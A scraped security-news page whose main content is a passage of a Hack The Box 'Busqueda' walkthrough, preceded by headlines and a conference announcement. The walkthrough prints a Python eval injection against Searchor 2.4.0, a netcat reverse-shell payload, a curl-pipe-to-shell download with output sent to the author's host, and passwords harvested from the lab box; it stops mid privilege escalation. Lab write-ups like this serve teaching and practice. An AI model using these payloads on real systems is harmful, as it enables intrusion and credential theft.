BackBox News

AI-Powered DEI Web Accessibility Hackathon 2025: Technical Innovations and Real-World Impact

March 17, 2025/in General News

Following the success of the Neuro Nostalgia Hackathon that closed out in 2024, Hackathon Raptors has completed its…

Hackread – Latest Cybersecurity, Tech, AI, Crypto & Hacking News – Read More

⚡ THN Weekly Recap: Router Hacks, PyPI Attacks, New Ransomware Decryptor, and More

March 17, 2025/in General News

From sophisticated nation-state campaigns to stealthy malware lurking in unexpected places, this week’s cybersecurity landscape is a reminder that attackers are always evolving. Advanced threat groups are exploiting outdated hardware, abusing legitimate tools for financial fraud, and finding new ways to bypass security defenses. Meanwhile, supply chain threats are on the rise, with open-source

The Hacker News – Read More

GitHub Action Compromise Puts CI/CD Secrets at Risk in Over 23,000 Repositories

March 17, 2025/in General News

Cybersecurity researchers are calling attention to an incident in which the popular GitHub Action tj-actions/changed-files was compromised to leak secrets from repositories using the continuous integration and continuous delivery (CI/CD) workflow.
The incident involved the tj-actions/changed-files GitHub Action, which is used in over 23,000 repositories. It’s used to track and retrieve all

The Hacker News – Read More

UK’s internet watchdog puts storage and file-sharing services on watch over CSAM

March 17, 2025/in General News

As duties under the U.K.’s Online Safety Act (OSA) related to tackling illegal content came into force Monday, the internet watchdog, Ofcom, said it has launched a new enforcement program focused on online storage and file-sharing services. The regulator said its evidence shows that file-sharing and file-storage services are “particularly susceptible” to being used for […]

Security News | TechCrunch – Read More

Popular GitHub Action Targeted in Supply Chain Attack

March 17, 2025/in General News

The tj-actions/changed-files GitHub Action, which is used in 23,000 repositories, has been targeted in a supply chain attack.

The post Popular GitHub Action Targeted in Supply Chain Attack appeared first on SecurityWeek.

SecurityWeek – Read More

European Cyber Report 2025: 137% more DDoS attacks than last year – what companies need to know

March 17, 2025/in General News

Frankfurt am Main, Germany, 17th March 2025, CyberNewsWire

Hackread – Latest Cybersecurity, Tech, AI, Crypto & Hacking News – Read More

European tech industry coalition calls for ‘radical action’ on digital sovereignty — starting with buying local

March 17, 2025/in General News

A broad coalition drawn from across the ranks of Europe’s tech industry is calling for “radical action” from European Union lawmakers to shrink reliance on foreign-owned digital infrastructure and services to bolster the bloc’s economic prospects, resilience, and security in increasingly fraught geopolitical times. In an open letter to European Commission president, Ursula von der […]

Security News | TechCrunch – Read More

SecjuiceCON 2025

March 17, 2025/in General News

After a decade of publishing your favorite infosec articles, we are very proud to announce SecjuiceCON 2025, our very first virtual conference. The first Secjuice conference is an online event for infosec and osint industry insiders, and we’d love for you to talk to our audience about your wisdom and learnings.

You might already know about our work, but Secjuice is the only non-profit, independent, and volunteer-led publication in the information security space. We are a private members’ writing club focused on cybersecurity, information security, hacking, and open-source intelligence gathering.

We believe that our value as professionals lies in our ability to share our research and knowledge with others through the written word. We mentor hackers and help them prepare their research for publication. Our members feel a strong sense of civic duty; it’s what drives us to spread our knowledge and experiences with our community. Defending the interests of those who hack is within our remit.

Conference Date

Mark it on your calendar!

Sunday, March 30, 2025

12 PM Eastern Daylight Savings Time (EDT)

4 PM Coordinated Universal Time (UTC)

Venue

YouTube Premier Video

https://www.youtube.com/@secjuice

Schedule and Presenters

The schedule uses the America/New_York or Eastern Daylight Savings time zone.

12 PM: Openining ceremonies
12:05 PM: Keynote presentation by Jamie Collier, Lead Advisor (Europe) at Google Threat Intelligence Group
1:00 PM: Lightning Talks
- “Containers Breakouts: From Zero to Host Computers” by Chaitanya Rahalkar
- “Zero Trust Architecture in Cloud and DevOps Environments” by Sai Sandeep Ogety
- “Deep Fake: Cybersecurity’s New Villian” by Sankalp Kumar
- “Maltego + Telegram = Magic: Stickers as a de-anonymization tool in Telegram” by Maksim Rogov
1:20 PM: “Disinformation in OSINT” by William Ruzich
1:40 PM: “Best Practices for Cybersecurity Project Management” by Tiffany Portis
2:00 PM: “Security Considerations for MLOps Infrastructure on AWS” by David Akuma
2:20 PM: “Attacking LLM Detectors with Homoglyph-Based Attacks” by Aldan Creo
2:40 PM: “Redefining Cloud Security with the Power of Blockchain and AI” by Sayali Paseband
3:00 PM: “Securing AI Workloads on Amazon Bedrock using GuardRails” by Lahiru Hewawasam
3:20 PM: “Hack a CEO” by Viktor Arato
3:40 PM: TBD
4:00 PM: “Embracing AI Red Teaming” by David Campbell
4:20 PM: Closing ceremonies

The schedule is tentative and subject to change.

Code Of Conduct

No drama, no hostility, maintain civility, or else.

Our Sponsors

We thank the following sponsors.

Gold Sponsors

Sessionize.com

Bronze Sponsors

Beyond The Firewall

Want to sponsor SecjuiceCon?

We are still accepting sponsorships.

Please email conference at secjuice dot com to get more details!!

Secjuice – Read More

HTB Busqueda Walkthrough

March 17, 2025/in General News

As usual, a nice and simple BOX with two relatively simple exploits even for beginners. Let’s go.

The nmap scan:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 15:08 EDT
Nmap scan report for 10.10.11.208
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
|_  256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://searcher.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.86 seconds

port 80 responds to the “searcher.htb” domain. Put it in the /etc/hosts file.

It seems to be a search engine collector.
Wappalyzer reports python (3.10.6) and flask (2.1.2) technology.

The portal is based on version 2.4.0 of an open-source project called Searchor with the repository on git

Searching for exploits I found this:

searchor 2.4.0 vulnerabilities | Snyk

Learn more about known searchor 2.4.0 vulnerabilities and licenses detected.

Find detailed information and remediation guidance for vulnerabilities.

Intercepting the calls using BurpSuite, I retrieve the request:

POST /search HTTP/1.1
Host: searcher.htb
Content-Length: 24
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://searcher.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://searcher.htb/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

engine=Amazon&query=test

Let’s try to investigate the code in the repository, crossing the information of the eval reported in the vulnerability and the request towards the /search routing. Download the 2.4.0 version of the source code (https://github.com/ArjunSharda/Searchor/releases/tag/v2.4.0).

Search the POST method…

def search(engine, query, open, copy):
    try:
        url = eval(
            f"Engine.{engine}.search('{query}', copy_url={copy}, open_web={open})"
        )
        click.echo(url)
        searchor.history.update(engine, query, url)
        if open:
            click.echo("opening browser...")
        if copy:
            click.echo("link copied to clipboard")
    except AttributeError:
        print("engine not recognized")

…and the Engine class:

class Engine(Enum):
    Accuweather = "https://www.accuweather.com/en/search-locations?query={query}"
    AlternativeTo = "https://alternativeto.net/browse/search/?q={query}"
    Amazon = "https://www.amazon.com/s?k={query}"
    AmazonWebServices = "https://aws.amazon.com/search/?searchQuery={query}"
    AOL = "https://search.aol.com/aol/search?q={query}"
    Apple = "https://www.apple.com/search/{query}"
[...]

Apparently, you can run some python code, it will be easier using the last parameter (open). Sniffing the request setting the “Auto redirect” check with BurpSuite…

POST /search HTTP/1.1
Host: searcher.htb
Content-Length: 39
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://searcher.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://searcher.htb/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

engine=Amazon&query=test&auto_redirect=

It seems that the backend code only checks for the presence of the parameter, so I can’t take advantage of the “auto_redirect” parameter, I’ll have to use the “query” parameter. The purpose is to pass a value such that a command is executed in addition to the original one. Starting from the construction of the original string, then

f"Engine.{engine}.search('{query}', copy_url={copy}, open_web={open})"

we have to close the string at the point of the query parameter. Just pass the value as the query value

test')#

This will terminate the string with the single quote, close the search command with the closing parenthesis, and comment out everything that follows.

Since the search of the engine class accepts the remaining parameters with default values, there will be no problems, as the search method in this case will be launched specifying only the first parameter.

    def search(self, query, open_web=False, copy_url=False, additional_queries: dict = None):
        url = self.value.format(query=quote(query, safe=""))
        if additional_queries:
            url += ("?" if "?" not in self.value.split("/")[-1] else "&") + "&".join(
                query + "=" + quote(query_val)
                for query, query_val in additional_queries.items()
            )
        if open_web is True:
            open_new_tab(url)

        if copy_url is True:
            pyperclip.copy(url)

        return url

But now I have to try to inject the code I want to execute, but failing to concatenate another string, I take advantage of a trick that allows me to execute some code through the use of the format of a string. The output of the search command of the Engine class still returns a string, on which I can perform a format. Since there are no variable markers, the format will have no effect, but it will still allow me to execute some code. As usual, to test, I’ll run a curl to my listening machine to see if the injection was successful. The query parameter will then look something like this:

test').format(__import__('os').popen('curl%20http://10.10.14.151').read())#

By replacing the parameter on the BurpSuite and launching the request, the surprise is not long in coming.

┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox]
└─$ php -S 10.10.14.151:80
[Sun Apr 30 17:34:23 2023] PHP 8.2.4 Development Server (http://10.10.14.151:80) started
[Sun Apr 30 18:00:30 2023] 10.10.11.208:38212 Accepted
[Sun Apr 30 18:00:30 2023] 10.10.11.208:38212 [404]: GET / - No such file or directory
[Sun Apr 30 18:00:30 2023] 10.10.11.208:38212 Closing

Perfect, it works, let’s convert curl to a reverse shell and activate our listener.

test').format(__import__('os').popen('rm%20-f%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202>%261|nc%2010.10.14.151%204444%20>/tmp/f').read())#

The BurpSuite will do the rest!

┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox]
└─$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.151] from searcher.htb [10.10.11.208] 37746
/bin/sh: 0: can't access tty; job control turned off
$ whoami
svc

Navigate to the home folder and let’s find out he’s the user with the flag.

$ cat user.txt  
f******************************2

Spawned a tty shell to test the sudo command but this user cannot launch sudo without a password. So, launch linpeas as usual, without leaving any trace.

Download linpeas and start the php native web server.

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.208 - Busqueda (lin)/attack/upld]
└─$ wget https://github.com/carlospolop/PEASS-ng/releases/download/20230425-bd7331ea/linpeas.sh
--2023-05-01 15:22:07--  https://github.com/carlospolop/PEASS-ng/releases/download/20230425-bd7331ea/linpeas.sh
Resolving github.com (github.com)... 140.82.121.3
Connecting to github.com (github.com)|140.82.121.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/ba2c0404-93e2-44d5-a884-e5c0a3af4a1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20230501%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20230501T192141Z&X-Amz-Expires=300&X-Amz-Signature=f1406d9bc0d84625cf1e57d0cbff85ba838dd4afbda36a5a4beee2260e83a21d&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream [following]
--2023-05-01 15:22:08--  https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/ba2c0404-93e2-44d5-a884-e5c0a3af4a1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20230501%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20230501T192141Z&X-Amz-Expires=300&X-Amz-Signature=f1406d9bc0d84625cf1e57d0cbff85ba838dd4afbda36a5a4beee2260e83a21d&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.110.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 830030 (811K) [application/octet-stream]
Saving to: ‘linpeas.sh’

linpeas.sh                                         100%[=============================================================================================================>] 810.58K  --.-KB/s    in 0.1s    

2023-05-01 15:22:09 (5.56 MB/s) - ‘linpeas.sh’ saved [830030/830030]

                                                                                                                                                                                                         
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.208 - Busqueda (lin)/attack/upld]
└─$ php -S 10.10.14.151:80
[Mon May  1 15:22:12 2023] PHP 8.2.4 Development Server (http://10.10.14.151:80) started

Then start the netcat listener that will receive the scan output.

nc -lp 4445 | tee lpeasout.file

And finally, launch the attack on the remote machine.

$ curl http://10.10.14.151/linpeas.sh | sh | nc 10.10.14.151 4445
curl http://10.10.14.151/linpeas.sh | sh | nc 10.10.14.151 4445
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
 49  810k   49  404k    0     0  16872      0  0:00:49  0:00:24  0:00:25 16873uniq: write error: Broken pipe. . . . . . . . . . . . . . . . . . . . . . . . . . . . 
 62  810k   62  504k    0     0  19232      0  0:00:43  0:00:26  0:00:17 19233cat: write error: Broken pipe
cat: write error: Broken pipe
sed: -e expression #1, char 0: no previous regular expression
100  810k  100  810k    0     0   7119      0  0:01:56  0:01:56 --:--:--  5756
sh: 3672:  [: not found
uniq: write error: Broken pipe
grep: write error: Broken pipe
grep: write error: Broken pipe
sh: 5415: Syntax error: Unterminated quoted string

Let the scan complete (check your netcat session).

linpeas output, interesting poits

[...]
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Dec 22 18:44 /etc/apache2/sites-enabled                                                                                                                                      
drwxr-xr-x 2 root root 4096 Dec 22 18:44 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 35 Dec  1 18:45 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
        ProxyPreserveHost On
        ServerName searcher.htb
        ServerAdmin admin@searcher.htb
        ProxyPass / http://127.0.0.1:5000/
        ProxyPassReverse / http://127.0.0.1:5000/
        RewriteEngine On
        RewriteCond %{HTTP_HOST} !^searcher.htb$
        RewriteRule /.* http://searcher.htb/ [R]
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
<VirtualHost *:80>
        ProxyPreserveHost On
        ServerName gitea.searcher.htb
        ServerAdmin admin@searcher.htb
        ProxyPass / http://127.0.0.1:3000/
        ProxyPassReverse / http://127.0.0.1:3000/
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
[...]
-rw-rw-r-- 1 svc svc 76 Apr  3 08:58 /home/svc/.gitconfig
[user]
        email = cody@searcher.htb
        name = cody
[core]
        hooksPath = no-hooks
[...]
╔══════════╣ Checking if containerd(ctr) is available
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation                                                                                                   
ctr was found in /usr/bin/ctr, you may be able to escalate privileges with it                                                                                                                            
ctr: failed to dial "/run/containerd/containerd.sock": connection error: desc = "transport: error while dialing: dial unix /run/containerd/containerd.sock: connect: permission denied"

╔══════════╣ Checking if runc is available
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation                                                                                                             
runc was found in /usr/sbin/runc, you may be able to escalate privileges with it                                                                                                                         

╔══════════╣ Searching docker files (limit 70)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation                                                                                  
lrwxrwxrwx 1 root root 33 Dec 21 19:13 /etc/systemd/system/sockets.target.wants/docker.socket -> /lib/systemd/system/docker.socket                                                                       
-rw-r--r-- 1 root root 175 Jan  3 18:47 /usr/lib/systemd/system/docker.socket
-rw-r--r-- 1 root root 477 Jun 15  2022 /usr/local/lib/node_modules/pm2/node_modules/@pm2/io/docker-compose.yml
-rw-r--r-- 1 root root 0 Dec 21 19:13 /var/lib/systemd/deb-systemd-helper-enabled/sockets.target.wants/docker.socket
[...]

Found an additional domain (gitea.searcher.htb), insert it on the /etc/hosts file and try to navigate.

Gitea Version: 1.18.0+rc1

Searching for some exploit, I find something (even an RCE), but be being authenticated. After some more searching, I can’t find anything of interest, so, convinced that the next clue has something to do with git anyway, I search the repositories available in this BOX.

$ find / -name ".git" 2>/dev/null
find / -name ".git" 2>/dev/null
/var/www/app/.git
/opt/scripts/.git

After searching the repository a bit, without much success, and not knowing exactly how to proceed, I start searching online and come across an interesting article.

22. Inside Git: .Git directory

$ cat .git/config
cat .git/config
[core]
        repositoryformatversion = 0
        filemode = true
        bare = false
        logallrefupdates = true
[remote "origin"]
        url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
        fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
        remote = origin
        merge = refs/heads/main

It seems that I have found what I was looking for and finally can access the gitea portal. So, I can come back on one of the previous exploits that need credentials.

Unfortunately I can’t even create a new repository. Anyway, I can connect via ssh using the password.

$ sudo -l
sudo -l
[sudo] password for svc: jh1usoih2bkjaspwe92

Matching Defaults entries for svc on busqueda:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin,
    use_pty

User svc may run the following commands on busqueda:
    (root) /usr/bin/python3 /opt/scripts/system-checkup.py *

Even though I can run it, I can’t read it.

$ cat /opt/scripts/system-checkup.py
cat /opt/scripts/system-checkup.py
cat: /opt/scripts/system-checkup.py: Permission denied

So, try to execute.

$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py *
sudo /usr/bin/python3 /opt/scripts/system-checkup.py *
Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)

     docker-ps     : List running docker containers
     docker-inspect : Inpect a certain docker container
     full-checkup  : Run a full system checkup

$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
CONTAINER ID   IMAGE                COMMAND                  CREATED        STATUS       PORTS                                             NAMES
960873171e2e   gitea/gitea:latest   "/usr/bin/entrypoint…"   4 months ago   Up 8 hours   127.0.0.1:3000->3000/tcp, 127.0.0.1:222->22/tcp   gitea
f84a6b33fb5a   mysql:8              "docker-entrypoint.s…"   4 months ago   Up 8 hours   127.0.0.1:3306->3306/tcp, 33060/tcp               mysql_db

$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect
Usage: /opt/scripts/system-checkup.py docker-inspect <format> <container_name>
$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
Something went wrong

I’ll probably have to use the docker command to elevate the privileges, but in the meantime let’s collect as much information as possible about the running containers as well.

$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .}}' 960873171e2e
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .}}' 960873171e2e
{"Id":"960873171e2e2058f2ac106ea9bfe5d7c737e8ebd358a39d2dd91548afd0ddeb","Created":"2023-01-06T17:26:54.457090149Z","Path":"/usr/bin/entrypoint","Args":["/bin/s6-svscan","/etc/s6"],"State":{"Status":"running","Running":true,"Paused":false,"Restarting":false,"OOMKilled":false,"Dead":false,"Pid":1828,"ExitCode":0,"Error":"","StartedAt":"2023-05-10T11:20:05.014741291Z","FinishedAt":"2023-04-04T17:03:01.71746837Z"},"Image":"sha256:6cd4959e1db11e85d89108b74db07e2a96bbb5c4eb3aa97580e65a8153ebcc78","ResolvConfPath":"/var/lib/docker/containers/960873171e2e2058f2ac106ea9bfe5d7c737e8ebd358a39d2dd91548afd0ddeb/resolv.conf","HostnamePath":"/var/lib/docker/containers/960873171e2e2058f2ac106ea9bfe5d7c737e8ebd358a39d2dd91548afd0ddeb/hostname","HostsPath":"/var/lib/docker/containers/960873171e2e2058f2ac106ea9bfe5d7c737e8ebd358a39d2dd91548afd0ddeb/hosts","LogPath":"/var/lib/docker/containers/960873171e2e2058f2ac106ea9bfe5d7c737e8ebd358a39d2dd91548afd0ddeb/960873171e2e2058f2ac106ea9bfe5d7c737e8ebd358a39d2dd91548afd0ddeb-json.log","Name":"/gitea","RestartCount":0,"Driver":"overlay2","Platform":"linux","MountLabel":"","ProcessLabel":"","AppArmorProfile":"docker-default","ExecIDs":null,"HostConfig":{"Binds":["/etc/timezone:/etc/timezone:ro","/etc/localtime:/etc/localtime:ro","/root/scripts/docker/gitea:/data:rw"],"ContainerIDFile":"","LogConfig":{"Type":"json-file","Config":{}},"NetworkMode":"docker_gitea","PortBindings":{"22/tcp":[{"HostIp":"127.0.0.1","HostPort":"222"}],"3000/tcp":[{"HostIp":"127.0.0.1","HostPort":"3000"}]},"RestartPolicy":{"Name":"always","MaximumRetryCount":0},"AutoRemove":false,"VolumeDriver":"","VolumesFrom":[],"CapAdd":null,"CapDrop":null,"CgroupnsMode":"private","Dns":[],"DnsOptions":[],"DnsSearch":[],"ExtraHosts":null,"GroupAdd":null,"IpcMode":"private","Cgroup":"","Links":null,"OomScoreAdj":0,"PidMode":"","Privileged":false,"PublishAllPorts":false,"ReadonlyRootfs":false,"SecurityOpt":null,"UTSMode":"","UsernsMode":"","ShmSize":67108864,"Runtime":"runc","ConsoleSize":[0,0],"Isolation":"","CpuShares":0,"Memory":0,"NanoCpus":0,"CgroupParent":"","BlkioWeight":0,"BlkioWeightDevice":null,"BlkioDeviceReadBps":null,"BlkioDeviceWriteBps":null,"BlkioDeviceReadIOps":null,"BlkioDeviceWriteIOps":null,"CpuPeriod":0,"CpuQuota":0,"CpuRealtimePeriod":0,"CpuRealtimeRuntime":0,"CpusetCpus":"","CpusetMems":"","Devices":null,"DeviceCgroupRules":null,"DeviceRequests":null,"KernelMemory":0,"KernelMemoryTCP":0,"MemoryReservation":0,"MemorySwap":0,"MemorySwappiness":null,"OomKillDisable":null,"PidsLimit":null,"Ulimits":null,"CpuCount":0,"CpuPercent":0,"IOMaximumIOps":0,"IOMaximumBandwidth":0,"MaskedPaths":["/proc/asound","/proc/acpi","/proc/kcore","/proc/keys","/proc/latency_stats","/proc/timer_list","/proc/timer_stats","/proc/sched_debug","/proc/scsi","/sys/firmware"],"ReadonlyPaths":["/proc/bus","/proc/fs","/proc/irq","/proc/sys","/proc/sysrq-trigger"]},"GraphDriver":{"Data":{"LowerDir":"/var/lib/docker/overlay2/6427abd571e4cb4ab5c484059a500e7f743cc85917b67cb305bff69b1220da34-init/diff:/var/lib/docker/overlay2/bd9193f562680204dc7c46c300e3410c51a1617811a43c97dffc9c3ee6b6b1b8/diff:/var/lib/docker/overlay2/df299917c1b8b211d36ab079a37a210326c9118be26566b07944ceb4342d3716/diff:/var/lib/docker/overlay2/50fb3b75789bf3c16c94f888a75df2691166dd9f503abeadabbc3aa808b84371/diff:/var/lib/docker/overlay2/3668660dd8ccd90774d7f567d0b63cef20cccebe11aaa21253da056a944aab22/diff:/var/lib/docker/overlay2/a5ca101c0f3a1900d4978769b9d791980a73175498cbdd47417ac4305dabb974/diff:/var/lib/docker/overlay2/aac5470669f77f5af7ad93c63b098785f70628cf8b47ac74db039aa3900a1905/diff:/var/lib/docker/overlay2/ef2d799b8fba566ee84a45a0070a1cf197cd9b6be58f38ee2bd7394bb7ca6560/diff:/var/lib/docker/overlay2/d45da5f3ac6633ab90762d7eeac53b0b83debef94e467aebed6171acca3dbc39/diff","MergedDir":"/var/lib/docker/overlay2/6427abd571e4cb4ab5c484059a500e7f743cc85917b67cb305bff69b1220da34/merged","UpperDir":"/var/lib/docker/overlay2/6427abd571e4cb4ab5c484059a500e7f743cc85917b67cb305bff69b1220da34/diff","WorkDir":"/var/lib/docker/overlay2/6427abd571e4cb4ab5c484059a500e7f743cc85917b67cb305bff69b1220da34/work"},"Name":"overlay2"},"Mounts":[{"Type":"bind","Source":"/root/scripts/docker/gitea","Destination":"/data","Mode":"rw","RW":true,"Propagation":"rprivate"},{"Type":"bind","Source":"/etc/localtime","Destination":"/etc/localtime","Mode":"ro","RW":false,"Propagation":"rprivate"},{"Type":"bind","Source":"/etc/timezone","Destination":"/etc/timezone","Mode":"ro","RW":false,"Propagation":"rprivate"}],"Config":{"Hostname":"960873171e2e","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":{"22/tcp":{},"3000/tcp":{}},"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":["USER_UID=115","USER_GID=121","GITEA__database__DB_TYPE=mysql","GITEA__database__HOST=db:3306","GITEA__database__NAME=gitea","GITEA__database__USER=gitea","GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh","PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","USER=git","GITEA_CUSTOM=/data/gitea"],"Cmd":["/bin/s6-svscan","/etc/s6"],"Image":"gitea/gitea:latest","Volumes":{"/data":{},"/etc/localtime":{},"/etc/timezone":{}},"WorkingDir":"","Entrypoint":["/usr/bin/entrypoint"],"OnBuild":null,"Labels":{"com.docker.compose.config-hash":"e9e6ff8e594f3a8c77b688e35f3fe9163fe99c66597b19bdd03f9256d630f515","com.docker.compose.container-number":"1","com.docker.compose.oneoff":"False","com.docker.compose.project":"docker","com.docker.compose.project.config_files":"docker-compose.yml","com.docker.compose.project.working_dir":"/root/scripts/docker","com.docker.compose.service":"server","com.docker.compose.version":"1.29.2","maintainer":"maintainers@gitea.io","org.opencontainers.image.created":"2022-11-24T13:22:00Z","org.opencontainers.image.revision":"9bccc60cf51f3b4070f5506b042a3d9a1442c73d","org.opencontainers.image.source":"https://github.com/go-gitea/gitea.git","org.opencontainers.image.url":"https://github.com/go-gitea/gitea"}},"NetworkSettings":{"Bridge":"","SandboxID":"576957ba1f33c882828ded9fba9c24391773af2cc643a05e04a6965a95796655","HairpinMode":false,"LinkLocalIPv6Address":"","LinkLocalIPv6PrefixLen":0,"Ports":{"22/tcp":[{"HostIp":"127.0.0.1","HostPort":"222"}],"3000/tcp":[{"HostIp":"127.0.0.1","HostPort":"3000"}]},"SandboxKey":"/var/run/docker/netns/576957ba1f33","SecondaryIPAddresses":null,"SecondaryIPv6Addresses":null,"EndpointID":"","Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"IPAddress":"","IPPrefixLen":0,"IPv6Gateway":"","MacAddress":"","Networks":{"docker_gitea":{"IPAMConfig":null,"Links":null,"Aliases":["server","960873171e2e"],"NetworkID":"cbf2c5ce8e95a3b760af27c64eb2b7cdaa71a45b2e35e6e03e2091fc14160227","EndpointID":"9cf85d867982a52a948f0346fa13fbe87bd2244ef427973aa671a2a76cb92b3f","Gateway":"172.19.0.1","IPAddress":"172.19.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:13:00:02","DriverOpts":null}}}}

And the environment variables section is really cool.

[...]
      "Env":[
         "USER_UID=115",
         "USER_GID=121",
         "GITEA__database__DB_TYPE=mysql",
         "GITEA__database__HOST=db:3306",
         "GITEA__database__NAME=gitea",
         "GITEA__database__USER=gitea",
         "GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh",
         "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
         "USER=git",
         "GITEA_CUSTOM=/data/gitea"
      ],
[...]

Obviously, the environment section of the second container is equally attractive.

[...]
      "Env":[
         "MYSQL_ROOT_PASSWORD=jI86kGUuj87guWr3RyF",
         "MYSQL_USER=gitea",
         "MYSQL_PASSWORD=yuiu1hoiu4i5ho1uh",
         "MYSQL_DATABASE=gitea",
         "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
         "GOSU_VERSION=1.14",
         "MYSQL_MAJOR=8.0",
         "MYSQL_VERSION=8.0.31-1.el8",
         "MYSQL_SHELL_VERSION=8.0.31-1.el8"
      ],
[...]

Passwords don’t seem, in any case, to be useful. Since the script appeared to use the docker command anyway, I tried hard to exploit that, trying passing additional commands and injecting alternative commands, but without success. Then I took a look at the folder where the script is located and found a couple of interesting clues.

-bash-5.1$ ls -la /opt/scripts/
total 28
drwxr-xr-x 3 root root 4096 Dec 24 18:23 .
drwxr-xr-x 4 root root 4096 Mar  1 10:46 ..
-rwx--x--x 1 root root  586 Dec 24 21:23 check-ports.py
-rwx--x--x 1 root root  857 Dec 24 21:23 full-checkup.sh
drwxr-x--- 8 root root 4096 Apr  3 15:04 .git
-rwx--x--x 1 root root 3346 Dec 24 21:23 install-flask.sh
-rwx--x--x 1 root root 1903 Dec 24 21:23 system-checkup.py

Inside the folder is a script named after the third argument that takes the original script and there appears to be a git repository. However, I don’t have permission to read the files inside, but let’s try to proceed on this new path.

